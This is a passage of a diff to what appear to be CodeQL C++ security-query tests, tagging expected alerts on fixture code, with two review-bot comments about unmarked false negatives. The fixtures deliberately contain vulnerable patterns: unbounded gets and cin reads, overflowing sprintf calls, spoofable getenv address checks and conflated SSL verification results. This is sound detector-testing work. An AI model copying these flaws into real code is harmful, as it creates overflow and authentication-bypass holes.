@@ -126,10 +126,10 @@ void test2() char *buffer4 = buffer1; std::istream &input = std::cin; - std::cin >> buffer1; // BAD: use of operator>> into a statically-allocated character array - std::cin >> buffer2; // BAD: use of operator>> into a statically-allocated character array - std::cin >> buffer3; // BAD: use of operator>> into a statically-allocated character array - std::cin >> buffer4; // BAD: use of operator>> into a statically-allocated character array + std::cin >> buffer1; // BAD: use of operator>> into a statically-allocated character array // $ Alert[cpp/dangerous-cin] + std::cin >> buffer2; // BAD: use of operator>> into a statically-allocated character array // $ Alert[cpp/dangerous-cin] + std::cin >> buffer3; // BAD: use of operator>> into a statically-allocated character array // $ Alert[cpp/dangerous-cin] + std::cin >> buffer4; // BAD: use of operator>> into a statically-allocated character array // $ Alert[cpp/dangerous-cin] input >> buffer1; // BAD: use of operator>> into a statically-allocated character array (NOT DETECTED) } @@ -154,7 +154,7 @@ void test2() int i, j, k; std::cin >> i >> j >> k; // GOOD: destinations are not character arrays - std::cin >> i >> buffer >> k; // BAD: use of operator>> into a statically-allocated character array + std::cin >> i >> buffer >> k; // BAD: use of operator>> into a statically-allocated character array // $ Alert[cpp/dangerous-cin] } @@ -163,7 +163,7 @@ void test2() static char buf[1024]; static int i; - std::wcin >> wbuf; // BAD: use of operator>> into a statically-allocated character array + std::wcin >> wbuf; // BAD: use of operator>> into a statically-allocated character array // $ Alert[cpp/dangerous-cin] std::wcin >> i; // GOOD: destination is not a character array } 
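Review bot: The context line `input >> buffer1; // BAD: ... (NOT DETECTED)` in the `@@ -126,10 +126,10 @@` hunk stays unannotated, so this known false negative is recorded only in prose while every detected line around it gets a machine-checked tag. Marking it `// $ MISSING: Alert[cpp/dangerous-cin]` would make the test report the change when detection improves. The `[NOT DETECTED]` `sprintf` and `vsprintf` lines in test3 and test5 (`@@ -255,8 +255,8 @@`, `@@ -284,7 +284,7 @@`) are in the same position; which query id belongs on those is not stated on the page. The body of `test2` continues outside the hunk.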
@@ -174,9 +174,9 @@ void test2() char buf[4096]; int i; - my_ifstream >> buf; // BAD: use of operator>> into a statically-allocated character array + my_ifstream >> buf; // BAD: use of operator>> into a statically-allocated character array // $ Alert[cpp/dangerous-cin] my_ifstream >> i; // GOOD: destination is not a character array - my_wifstream >> wbuf; // BAD: use of operator>> into a statically-allocated character array + my_wifstream >> wbuf; // BAD: use of operator>> into a statically-allocated character array // $ Alert[cpp/dangerous-cin] my_wifstream >> i; // GOOD: destination is not a character array } @@ -187,10 +187,10 @@ void test2() std::cin.width(10); std::cin >> buf1; // GOOD: controlled by width() - std::cin >> buf2; // BAD: uncontrolled by width() + std::cin >> buf2; // BAD: uncontrolled by width() // $ Alert[cpp/dangerous-cin] std::cin.width(10); - std::cin >> buf1 >> buf2; // BAD: buf2 is uncontrolled by width() + std::cin >> buf1 >> buf2; // BAD: buf2 is uncontrolled by width() // $ Alert[cpp/dangerous-cin] std::cin.width(10); std::cin >> i; // GOOD: destination is not a character array 
@@ -200,18 +200,18 @@ void test2() std::cin >> i >> buf1; // GOOD: controlled by width() std::cin.width(20); - std::cin >> buf1; // BAD: specified width is too large + std::cin >> buf1; // BAD: specified width is too large // $ Alert[cpp/dangerous-cin] std::cin.width(int_func()); std::cin >> buf1; // GOOD: controlled by width() std::wcin.width(10); - std::cin >> buf2; // BAD: uncontrolled by width() + std::cin >> buf2; // BAD: uncontrolled by width() // $ Alert[cpp/dangerous-cin] std::wcin >> wbuf; // GOOD: controlled by width() std::cin >> std::setw(10) >> buf1; // GOOD: controlled by setw - std::cin >> std::setw(10) >> buf1 >> buf2; // BAD: buf2 is uncontrolled - std::cin >> std::setw(20) >> buf1; // BAD: specified width is too large + std::cin >> std::setw(10) >> buf1 >> buf2; // BAD: buf2 is uncontrolled // $ Alert[cpp/dangerous-cin] + std::cin >> std::setw(20) >> buf1; // BAD: specified width is too large // $ Alert[cpp/dangerous-cin] std::cin.width(20); std::cin.width(10); @@ -222,7 +222,7 @@ void test2() char buf[10]; int i; - (std::cin >> i) >> buf; // BAD: use of operator>> into a statically-allocated character array + (std::cin >> i) >> buf; // BAD: use of operator>> into a statically-allocated character array // $ Alert[cpp/dangerous-cin] (std::cin >> i).width(10); std::cin >> buf; // GOOD: controlled by width() @@ -234,7 +234,7 @@ void test2() char buf[10]; std::string str; - std::cin >> std::setw(10) >> str >> buf; // BAD: buf is uncontrolled + std::cin >> std::setw(10) >> str >> buf; // BAD: buf is uncontrolled // $ Alert[cpp/dangerous-cin] } } 
@@ -246,8 +246,8 @@ void test3(char c, int val, char *str) char buffer10[10]; MyCharArray myBuffer10; - gets(buffer10); // BAD: use of gets - gets(myBuffer10); // BAD: use of gets + gets(buffer10); // BAD: use of gets // $ Alert[cpp/dangerous-function-overflow] + gets(myBuffer10); // BAD: use of gets // $ Alert[cpp/dangerous-function-overflow] sprintf(buffer10, "%c", c); // GOOD sprintf(myBuffer10, "%c", c); // GOOD @@ -255,8 +255,8 @@ void test3(char c, int val, char *str) sprintf(buffer10, "%s", str); // BAD: potential buffer overflow [NOT DETECTED] sprintf(myBuffer10, "%s", str); // BAD: potential buffer overflow [NOT DETECTED] - sprintf(buffer10, "val: %i", val); // BAD: potential buffer overflow - sprintf(myBuffer10, "val: %i", val); // BAD: potential buffer overflow + sprintf(buffer10, "val: %i", val); // BAD: potential buffer overflow // $ Alert[cpp/overrunning-write] + sprintf(myBuffer10, "val: %i", val); // BAD: potential buffer overflow // $ Alert[cpp/overrunning-write] } void test3_caller() @@ -269,8 +269,8 @@ void test4() char buffer8[8]; char *buffer8_ptr = buffer8; - sprintf(buffer8, "12345678"); // BAD: buffer overflow - sprintf(buffer8_ptr, "12345678"); // BAD: buffer overflow + sprintf(buffer8, "12345678"); // BAD: buffer overflow // $ Alert[cpp/very-likely-overrunning-write] + sprintf(buffer8_ptr, "12345678"); // BAD: buffer overflow // $ Alert[cpp/very-likely-overrunning-write] } typedef void *va_list; @@ -284,7 +284,7 @@ void test5(va_list args, float f) vsprintf(buffer10, "123456789", args); // GOOD vsprintf(buffer10, "1234567890", args); // BAD: buffer overflow [NOT DETECTED] - sprintf(buffer64, "%f", f); // BAD: potential buffer overflow + sprintf(buffer64, "%f", f); // BAD: potential buffer overflow // $ Alert[cpp/overrunning-write-with-float] vsprintf(buffer4, "123", args); // GOOD vsprintf(buffer4, "1234", args); // BAD: buffer overflow [NOT DETECTED] 
@@ -305,28 +305,28 @@ namespace custom_sprintf_impl { void regression_test1() { char buffer8[8]; - sprintf(buffer8, "12345678"); // BAD: potential buffer overflow + sprintf(buffer8, "12345678"); // BAD: potential buffer overflow // $ Alert[cpp/very-likely-overrunning-write] } } void test6(unsigned unsigned_value, int value) { char buffer2[2], buffer3[3], buffer4[4], buffer5[5]; - sprintf(buffer4, "%u", unsigned_value); // BAD: buffer overflow - sprintf(buffer4, "%d", unsigned_value); // BAD: buffer overflow + sprintf(buffer4, "%u", unsigned_value); // BAD: buffer overflow // $ Alert[cpp/overrunning-write] + sprintf(buffer4, "%d", unsigned_value); // BAD: buffer overflow // $ Alert[cpp/overrunning-write] if (unsigned_value < 1000) { sprintf(buffer4, "%u", unsigned_value); // GOOD } - sprintf(buffer4, "%u", -100); // BAD: buffer overflow + sprintf(buffer4, "%u", -100); // BAD: buffer overflow // $ Alert[cpp/very-likely-overrunning-write] if(unsigned_value == (unsigned)-100) { - sprintf(buffer4, "%u", unsigned_value); // BAD: buffer overflow + sprintf(buffer4, "%u", unsigned_value); // BAD: buffer overflow // $ Alert[cpp/very-likely-overrunning-write] } - sprintf(buffer4, "%d", value); // BAD: buffer overflow + sprintf(buffer4, "%d", value); // BAD: buffer overflow // $ Alert[cpp/overrunning-write] if (value < 1000) { - sprintf(buffer4, "%d", value); // BAD: buffer overflow + sprintf(buffer4, "%d", value); // BAD: buffer overflow // $ Alert[cpp/overrunning-write] if(value > -100) { sprintf(buffer4, "%d", value); // GOOD 
@@ -338,28 +338,28 @@ void test6(unsigned unsigned_value, int value) { sprintf(buffer2, "%u", 5); // GOOD sprintf(buffer2, "%d", 5); // GOOD - sprintf(buffer2, "%d", -1); // BAD + sprintf(buffer2, "%d", -1); // BAD // $ Alert[cpp/very-likely-overrunning-write] sprintf(buffer2, "%d", 9); // GOOD - sprintf(buffer2, "%d", 10); // BAD + sprintf(buffer2, "%d", 10); // BAD // $ Alert[cpp/very-likely-overrunning-write] - sprintf(buffer2, "%u", -1); // BAD + sprintf(buffer2, "%u", -1); // BAD // $ Alert[cpp/very-likely-overrunning-write] sprintf(buffer2, "%u", 9); // GOOD - sprintf(buffer2, "%u", 10); // BAD + sprintf(buffer2, "%u", 10); // BAD // $ Alert[cpp/very-likely-overrunning-write] unsigned char unsigned_char = unsigned_value; - sprintf(buffer3, "%u", (unsigned)unsigned_char); // BAD + sprintf(buffer3, "%u", (unsigned)unsigned_char); // BAD // $ Alert[cpp/overrunning-write] sprintf(buffer4, "%u", (unsigned)unsigned_char); // GOOD: 0..255 fits unsigned small = unsigned_value >> (sizeof(unsigned_value) * 8 - 9); // in range 0..511 - sprintf(buffer3, "%u", small); // BAD + sprintf(buffer3, "%u", small); // BAD // $ Alert[cpp/very-likely-overrunning-write] sprintf(buffer4, "%u", small); // GOOD small = unsigned_value & ((1u << 9) - 1); // in range 0..511 - sprintf(buffer3, "%u", small); // BAD + sprintf(buffer3, "%u", small); // BAD // $ Alert[cpp/very-likely-overrunning-write] sprintf(buffer4, "%u", small); // GOOD: 0..511 fits char c = value; - sprintf(buffer4, "%d", (int)c); // BAD: e.g. -127 does not fit + sprintf(buffer4, "%d", (int)c); // BAD: e.g. -127 does not fit // $ Alert[cpp/overrunning-write] sprintf(buffer5, "%d", (int)c); // GOOD: -127..128 fits } \ No newline at end of file diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-253/HResultBooleanConversion.c b/cpp/ql/test/query-tests/Security/CWE/CWE-253/HResultBooleanConversion.c index 732fd5f0f443..61c7817b5b93 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-253/HResultBooleanConversion.c 
+++ b/cpp/ql/test/query-tests/Security/CWE/CWE-253/HResultBooleanConversion.c @@ -39,22 +39,22 @@ bool BoolFunction2() HRESULT IncorrectHresultFunction() { - return BoolFunction(); // BUG + return BoolFunction(); // BUG // $ Alert } HRESULT IncorrectHresultFunction2() { - return BoolFunction2(); // BUG + return BoolFunction2(); // BUG // $ Alert } void IncorrectTypeConversionTest() { HRESULT hr = HresultFunction(); - if ((BOOL)hr) // BUG + if ((BOOL)hr) // BUG // $ Alert { // ... } - if ((bool)hr) // BUG + if ((bool)hr) // BUG // $ Alert { // ... } @@ -63,11 +63,11 @@ void IncorrectTypeConversionTest() { // ... } - if (SUCCEEDED(BoolFunction())) // BUG + if (SUCCEEDED(BoolFunction())) // BUG // $ Alert { // ... } - if (SUCCEEDED(BoolFunction2())) // BUG + if (SUCCEEDED(BoolFunction2())) // BUG // $ Alert { // ... } @@ -75,11 +75,11 @@ void IncorrectTypeConversionTest() { { // ... } - BOOL b = IncorrectHresultFunction(); // BUG - bool b2 = IncorrectHresultFunction(); // BUG + BOOL b = IncorrectHresultFunction(); // BUG // $ Alert + bool b2 = IncorrectHresultFunction(); // BUG // $ Alert hr = E_UNEXPECTED; - if (!hr) // BUG + if (!hr) // BUG // $ Alert { // ... } @@ -89,7 +89,7 @@ void IncorrectTypeConversionTest() { } hr = S_FALSE; - if (hr) // BUG + if (hr) // BUG // $ Alert { // ... } @@ -103,7 +103,7 @@ void IncorrectTypeConversionTest() { // ... } - while (!HresultFunction()) {}; // BUG + while (!HresultFunction()) {}; // BUG // $ Alert while (FAILED(HresultFunction())) {}; // Correct Usage switch(hr) // Correct Usage diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-253/HResultBooleanConversion.cpp b/cpp/ql/test/query-tests/Security/CWE/CWE-253/HResultBooleanConversion.cpp index d2857226bfaa..8e1ede3d618d 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-253/HResultBooleanConversion.cpp +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-253/HResultBooleanConversion.cpp 
@@ -36,22 +36,22 @@ bool BoolFunction2() HRESULT IncorrectHresultFunction() { - return BoolFunction(); // BUG + return BoolFunction(); // BUG // $ Alert } HRESULT IncorrectHresultFunction2() { - return BoolFunction2(); // BUG + return BoolFunction2(); // BUG // $ Alert } void IncorrectTypeConversionTest() { HRESULT hr = HresultFunction(); - if ((BOOL)hr) // BUG + if ((BOOL)hr) // BUG // $ Alert { // ... } - if ((bool)hr) // BUG + if ((bool)hr) // BUG // $ Alert { // ... } @@ -60,11 +60,11 @@ void IncorrectTypeConversionTest() { // ... } - if (SUCCEEDED(BoolFunction())) // BUG + if (SUCCEEDED(BoolFunction())) // BUG // $ Alert { // ... } - if (SUCCEEDED(BoolFunction2())) // BUG + if (SUCCEEDED(BoolFunction2())) // BUG // $ Alert { // ... } @@ -72,11 +72,11 @@ void IncorrectTypeConversionTest() { { // ... } - BOOL b = IncorrectHresultFunction(); // BUG - bool b2 = IncorrectHresultFunction(); // BUG + BOOL b = IncorrectHresultFunction(); // BUG // $ Alert + bool b2 = IncorrectHresultFunction(); // BUG // $ Alert hr = E_UNEXPECTED; - if (!hr) // BUG + if (!hr) // BUG // $ Alert { // ... } @@ -86,7 +86,7 @@ void IncorrectTypeConversionTest() { } hr = S_FALSE; - if (hr) // BUG + if (hr) // BUG // $ Alert { // ... } @@ -100,7 +100,7 @@ void IncorrectTypeConversionTest() { // ... } - while (!HresultFunction()) {}; // BUG + while (!HresultFunction()) {}; // BUG // $ Alert while (FAILED(HresultFunction())) {}; // Correct Usage switch(hr) // Correct Usage diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-253/HResultBooleanConversion.qlref b/cpp/ql/test/query-tests/Security/CWE/CWE-253/HResultBooleanConversion.qlref index a345e5c6dfb3..101c0a1e3e2e 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-253/HResultBooleanConversion.qlref +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-253/HResultBooleanConversion.qlref 
@@ -1 +1,2 @@
-Security/CWE/CWE-253/HResultBooleanConversion.ql
\ No newline at end of file
+query: Security/CWE/CWE-253/HResultBooleanConversion.ql
+postprocess: utils/test/InlineExpectationsTestQuery.ql
diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-290/semmle/AuthenticationBypass/AuthenticationBypass.expected b/cpp/ql/test/query-tests/Security/CWE/CWE-290/semmle/AuthenticationBypass/AuthenticationBypass.expected
index 117f94cfad8a..205d347a7740 100644
--- a/cpp/ql/test/query-tests/Security/CWE/CWE-290/semmle/AuthenticationBypass/AuthenticationBypass.expected
+++ b/cpp/ql/test/query-tests/Security/CWE/CWE-290/semmle/AuthenticationBypass/AuthenticationBypass.expected
@@ -1,3 +1,10 @@ +#select +| test.cpp:20:7:20:12 | call to strcmp | test.cpp:16:25:16:42 | *call to getenv | test.cpp:20:14:20:20 | *address | Untrusted input $@ might be vulnerable to a spoofing attack. | test.cpp:16:25:16:42 | *call to getenv | an environment variable | +| test.cpp:31:7:31:12 | call to strcmp | test.cpp:27:25:27:42 | *call to getenv | test.cpp:31:14:31:20 | *address | Untrusted input $@ might be vulnerable to a spoofing attack. | test.cpp:27:25:27:42 | *call to getenv | an environment variable | +| test.cpp:42:7:42:12 | call to strcmp | test.cpp:38:25:38:42 | *call to getenv | test.cpp:42:14:42:20 | *address | Untrusted input $@ might be vulnerable to a spoofing attack. | test.cpp:38:25:38:42 | *call to getenv | an environment variable | +| test.cpp:52:7:52:12 | call to strcmp | test.cpp:49:25:49:42 | *call to getenv | test.cpp:52:14:52:20 | *address | Untrusted input $@ might be vulnerable to a spoofing attack. | test.cpp:49:25:49:42 | *call to getenv | an environment variable | +| test.cpp:56:7:56:12 | call to strcmp | test.cpp:49:25:49:42 | *call to getenv | test.cpp:56:14:56:20 | *address | Untrusted input $@ might be vulnerable to a spoofing attack. | test.cpp:49:25:49:42 | *call to getenv | an environment variable | +| test.cpp:60:7:60:12 | call to strcmp | test.cpp:49:25:49:42 | *call to getenv | test.cpp:60:14:60:20 | *address | Untrusted input $@ might be vulnerable to a spoofing attack. | test.cpp:49:25:49:42 | *call to getenv | an environment variable | edges | test.cpp:16:25:16:42 | *call to getenv | test.cpp:16:25:16:42 | *call to getenv | provenance | | | test.cpp:16:25:16:42 | *call to getenv | test.cpp:20:14:20:20 | *address | provenance | | 
@@ -25,10 +32,3 @@ nodes | test.cpp:56:14:56:20 | *address | semmle.label | *address | | test.cpp:60:14:60:20 | *address | semmle.label | *address | subpaths -#select -| test.cpp:20:7:20:12 | call to strcmp | test.cpp:16:25:16:42 | *call to getenv | test.cpp:20:14:20:20 | *address | Untrusted input $@ might be vulnerable to a spoofing attack. | test.cpp:16:25:16:42 | *call to getenv | an environment variable | -| test.cpp:31:7:31:12 | call to strcmp | test.cpp:27:25:27:42 | *call to getenv | test.cpp:31:14:31:20 | *address | Untrusted input $@ might be vulnerable to a spoofing attack. | test.cpp:27:25:27:42 | *call to getenv | an environment variable | -| test.cpp:42:7:42:12 | call to strcmp | test.cpp:38:25:38:42 | *call to getenv | test.cpp:42:14:42:20 | *address | Untrusted input $@ might be vulnerable to a spoofing attack. | test.cpp:38:25:38:42 | *call to getenv | an environment variable | -| test.cpp:52:7:52:12 | call to strcmp | test.cpp:49:25:49:42 | *call to getenv | test.cpp:52:14:52:20 | *address | Untrusted input $@ might be vulnerable to a spoofing attack. | test.cpp:49:25:49:42 | *call to getenv | an environment variable | -| test.cpp:56:7:56:12 | call to strcmp | test.cpp:49:25:49:42 | *call to getenv | test.cpp:56:14:56:20 | *address | Untrusted input $@ might be vulnerable to a spoofing attack. | test.cpp:49:25:49:42 | *call to getenv | an environment variable | -| test.cpp:60:7:60:12 | call to strcmp | test.cpp:49:25:49:42 | *call to getenv | test.cpp:60:14:60:20 | *address | Untrusted input $@ might be vulnerable to a spoofing attack. | test.cpp:49:25:49:42 | *call to getenv | an environment variable | diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-290/semmle/AuthenticationBypass/AuthenticationBypass.qlref b/cpp/ql/test/query-tests/Security/CWE/CWE-290/semmle/AuthenticationBypass/AuthenticationBypass.qlref index cf3c4b27d278..3e4f219f5233 100644 
--- a/cpp/ql/test/query-tests/Security/CWE/CWE-290/semmle/AuthenticationBypass/AuthenticationBypass.qlref
+++ b/cpp/ql/test/query-tests/Security/CWE/CWE-290/semmle/AuthenticationBypass/AuthenticationBypass.qlref
@@ -1 +1,2 @@
-Security/CWE/CWE-290/AuthenticationBypass.ql
\ No newline at end of file
+query: Security/CWE/CWE-290/AuthenticationBypass.ql
+postprocess: utils/test/InlineExpectationsTestQuery.ql
diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-290/semmle/AuthenticationBypass/test.cpp b/cpp/ql/test/query-tests/Security/CWE/CWE-290/semmle/AuthenticationBypass/test.cpp
index 72b9155cb841..92fe7c24748e 100644
--- a/cpp/ql/test/query-tests/Security/CWE/CWE-290/semmle/AuthenticationBypass/test.cpp
+++ b/cpp/ql/test/query-tests/Security/CWE/CWE-290/semmle/AuthenticationBypass/test.cpp
@@ -13,51 +13,51 @@ int isServer; void processRequest1() { - const char *address = getenv("SERVERIP"); + const char *address = getenv("SERVERIP"); // $ Source // BAD: the address is controllable by the user, so it // could be spoofed to bypass the security check. - if (strcmp(address, "127.0.0.1")) { + if (strcmp(address, "127.0.0.1")) { // $ Alert isServer = 1; } } void processRequest2() { - const char *address = getenv("SERVERIP"); + const char *address = getenv("SERVERIP"); // $ Source // BAD: the address is controllable by the user, so it // could be spoofed to bypass the security check. - if (strcmp(address, "www.mycompany.com")) { + if (strcmp(address, "www.mycompany.com")) { // $ Alert isServer = 1; } } void processRequest3() { - const char *address = getenv("SERVERIP"); + const char *address = getenv("SERVERIP"); // $ Source // BAD: the address is controllable by the user, so it // could be spoofed to bypass the security check. - if (strcmp(address, "www.mycompany.co.uk")) { + if (strcmp(address, "www.mycompany.co.uk")) { // $ Alert isServer = 1; } } void processRequest4() { - const char *address = getenv("SERVERIP"); + const char *address = getenv("SERVERIP"); // $ Source bool cond = false; - if (strcmp(address, "127.0.0.1")) { cond = true; } // BAD + if (strcmp(address, "127.0.0.1")) { cond = true; } // BAD // $ Alert if (strcmp(address, "127_0_0_1")) { cond = true; } // GOOD (not an IP) if (strcmp(address, "127.0.0")) { cond = true; } // GOOD (not an IP) if (strcmp(address, "127.0.0.0.1")) { cond = true; } // GOOD (not an IP) - if (strcmp(address, "http://mycompany")) { cond = true; } // BAD + if (strcmp(address, "http://mycompany")) { cond = true; } // BAD // $ Alert if (strcmp(address, "http_//mycompany")) { cond = true; } // GOOD (not an address) if (strcmp(address, "htt://mycompany")) { cond = true; } // GOOD (not an address) if (strcmp(address, "httpp://mycompany")) { cond = true; } // GOOD (not an address) - if (strcmp(address, "mycompany.com")) { 
cond = true; } // BAD + if (strcmp(address, "mycompany.com")) { cond = true; } // BAD // $ Alert if (strcmp(address, "mycompany_com")) { cond = true; } // GOOD (not an address) if (strcmp(address, "mycompany.c")) { cond = true; } // GOOD (not an address) if (strcmp(address, "mycompany.comm")) { cond = true; } // GOOD (not an address) diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-295/SSLResultConflation.qlref b/cpp/ql/test/query-tests/Security/CWE/CWE-295/SSLResultConflation.qlref index 493b42eeae1f..116b386747b9 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-295/SSLResultConflation.qlref +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-295/SSLResultConflation.qlref @@ -1 +1,2 @@ -Security/CWE/CWE-295/SSLResultConflation.ql \ No newline at end of file +query: Security/CWE/CWE-295/SSLResultConflation.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-295/SSLResultNotChecked.qlref b/cpp/ql/test/query-tests/Security/CWE/CWE-295/SSLResultNotChecked.qlref index f019c08b357a..fc0209620fec 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-295/SSLResultNotChecked.qlref +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-295/SSLResultNotChecked.qlref @@ -1 +1,2 @@ -Security/CWE/CWE-295/SSLResultNotChecked.ql \ No newline at end of file +query: Security/CWE/CWE-295/SSLResultNotChecked.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-295/test.cpp b/cpp/ql/test/query-tests/Security/CWE/CWE-295/test.cpp index 74f00600a506..d059123b30b4 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-295/test.cpp +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-295/test.cpp 
@@ -15,7 +15,7 @@ bool is_ok(int result) bool is_maybe_ok(int result) { - return (result == 0) || (result == 1); // BAD (conflates OK and a non-OK codes) + return (result == 0) || (result == 1); // BAD (conflates OK and a non-OK codes) // $ Alert[cpp/certificate-result-conflation] } void test1_1(SSL *ssl) @@ -35,7 +35,7 @@ void test1_1(SSL *ssl) { int result = SSL_get_verify_result(ssl); - if ((result == 0) || (result == 1)) // BAD (conflates OK and a non-OK codes) + if ((result == 0) || (result == 1)) // BAD (conflates OK and a non-OK codes) // $ Alert[cpp/certificate-result-conflation] { } } @@ -51,7 +51,7 @@ void test1_1(SSL *ssl) { int result = SSL_get_verify_result(ssl); - if ((result == 0) || (false) || (result == 2)) // BAD (conflates OK and a non-OK codes) + if ((result == 0) || (false) || (result == 2)) // BAD (conflates OK and a non-OK codes) // $ Alert[cpp/certificate-result-conflation] { } } @@ -59,7 +59,7 @@ void test1_1(SSL *ssl) { int result = SSL_get_verify_result(ssl); - if ((0 == result) || (1 == result)) // BAD (conflates OK and a non-OK codes) + if ((0 == result) || (1 == result)) // BAD (conflates OK and a non-OK codes) // $ Alert[cpp/certificate-result-conflation] { } } @@ -67,7 +67,7 @@ void test1_1(SSL *ssl) { int result = SSL_get_verify_result(ssl); - if ((result != 0) && (result != 1)) // BAD (conflates OK and a non-OK codes) + if ((result != 0) && (result != 1)) // BAD (conflates OK and a non-OK codes) // $ Alert[cpp/certificate-result-conflation] { } else { // conflation occurs here 
@@ -80,11 +80,11 @@ void test1_1(SSL *ssl) int result2 = get_verify_result_indirect(ssl); int result3 = something_else(ssl); - if ((result == 0) || (result_cpy == 1)) // BAD (conflates OK and a non-OK codes) + if ((result == 0) || (result_cpy == 1)) // BAD (conflates OK and a non-OK codes) // $ Alert[cpp/certificate-result-conflation] { } - if ((result2 == 0) || (result2 == 1)) // BAD (conflates OK and a non-OK codes) + if ((result2 == 0) || (result2 == 1)) // BAD (conflates OK and a non-OK codes) // $ Alert[cpp/certificate-result-conflation] { } @@ -104,9 +104,9 @@ void test1_1(SSL *ssl) { int result = SSL_get_verify_result(ssl); - bool ok = (result == 0) || (result == 1); // BAD (conflates OK and a non-OK codes) + bool ok = (result == 0) || (result == 1); // BAD (conflates OK and a non-OK codes) // $ Alert[cpp/certificate-result-conflation] - if (ok) { + if (ok) { // $ Alert[cpp/certificate-result-conflation] } } diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-295/test2.cpp b/cpp/ql/test/query-tests/Security/CWE/CWE-295/test2.cpp index ed6e3989f2b0..46f89f79868b 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-295/test2.cpp +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-295/test2.cpp @@ -10,7 +10,7 @@ bool maybe(); bool test2_1(SSL *ssl) { - int cert = SSL_get_peer_certificate(ssl); // BAD (SSL_get_verify_result is never called) + int cert = SSL_get_peer_certificate(ssl); // BAD (SSL_get_verify_result is never called) // $ Alert[cpp/certificate-not-checked] return true; } @@ -25,7 +25,7 @@ bool test2_2(SSL *ssl) bool test2_3(SSL *ssl) { - int cert = SSL_get_peer_certificate(ssl); // BAD (SSL_get_verify_result may not be called) + int cert = SSL_get_peer_certificate(ssl); // BAD (SSL_get_verify_result may not be called) // $ Alert[cpp/certificate-not-checked] if (maybe()) { 
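Review bot: In the `@@ -104,9 +104,9 @@` hunk of CWE-295/test.cpp, `if (ok) {` gains `// $ Alert[cpp/certificate-result-conflation]` but carries no BAD/GOOD remark, unlike the other annotated lines visible in this file. A reader cannot tell whether this second alert on the same conflated value is an intended result or a duplicate being baselined. A short remark would document it, for example `if (ok) { // BAD (branches on the conflated result) // $ Alert[cpp/certificate-result-conflation]`. `test1_1` starts and ends outside the hunk.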
@@ -58,7 +58,7 @@ bool test2_5(SSL *ssl) { int cert, result; - cert = SSL_get_peer_certificate(ssl); // BAD (SSL_get_verify_result is not used reliably) + cert = SSL_get_peer_certificate(ssl); // BAD (SSL_get_verify_result is not used reliably) // $ Alert[cpp/certificate-not-checked] if ((cert != 0) && (maybe())) { result = SSL_get_verify_result(ssl); @@ -86,7 +86,7 @@ bool test2_7(SSL *ssl) { int cert; - cert = SSL_get_peer_certificate(ssl); // BAD (SSL_get_verify_result is only called when there is not a cert) + cert = SSL_get_peer_certificate(ssl); // BAD (SSL_get_verify_result is only called when there is not a cert) // $ Alert[cpp/certificate-not-checked] if (cert != 0) return false; if (SSL_get_verify_result(ssl) != 0) return false; diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-311/semmle/tests/CleartextBufferWrite.expected b/cpp/ql/test/query-tests/Security/CWE/CWE-311/semmle/tests/CleartextBufferWrite.expected index 4133d62f00a3..7598d27e2153 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-311/semmle/tests/CleartextBufferWrite.expected +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-311/semmle/tests/CleartextBufferWrite.expected @@ -1,3 +1,6 @@ +#select +| test2.cpp:110:3:110:6 | call to gets | test2.cpp:110:3:110:6 | *call to gets | test2.cpp:110:3:110:6 | *call to gets | This write into buffer 'password' may contain unencrypted data from $@. | test2.cpp:110:3:110:6 | *call to gets | user input (string read by gets) | +| test.cpp:58:3:58:9 | call to sprintf | test.cpp:53:27:53:30 | **argv | test.cpp:58:25:58:29 | *input | This write into buffer 'passwd' may contain unencrypted data from $@. | test.cpp:53:27:53:30 | **argv | user input (a command-line argument) | edges | test.cpp:53:27:53:30 | **argv | test.cpp:54:17:54:23 | *access to array | provenance | | | test.cpp:54:17:54:23 | *access to array | test.cpp:58:25:58:29 | *input | provenance | | 
@@ -7,6 +10,3 @@ nodes | test.cpp:54:17:54:23 | *access to array | semmle.label | *access to array | | test.cpp:58:25:58:29 | *input | semmle.label | *input | subpaths -#select -| test2.cpp:110:3:110:6 | call to gets | test2.cpp:110:3:110:6 | *call to gets | test2.cpp:110:3:110:6 | *call to gets | This write into buffer 'password' may contain unencrypted data from $@. | test2.cpp:110:3:110:6 | *call to gets | user input (string read by gets) | -| test.cpp:58:3:58:9 | call to sprintf | test.cpp:53:27:53:30 | **argv | test.cpp:58:25:58:29 | *input | This write into buffer 'passwd' may contain unencrypted data from $@. | test.cpp:53:27:53:30 | **argv | user input (a command-line argument) | diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-311/semmle/tests/CleartextBufferWrite.qlref b/cpp/ql/test/query-tests/Security/CWE/CWE-311/semmle/tests/CleartextBufferWrite.qlref index 6c83c30d549e..05046b6a5d53 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-311/semmle/tests/CleartextBufferWrite.qlref +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-311/semmle/tests/CleartextBufferWrite.qlref @@ -1 +1,2 @@ -Security/CWE/CWE-311/CleartextBufferWrite.ql \ No newline at end of file +query: Security/CWE/CWE-311/CleartextBufferWrite.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git 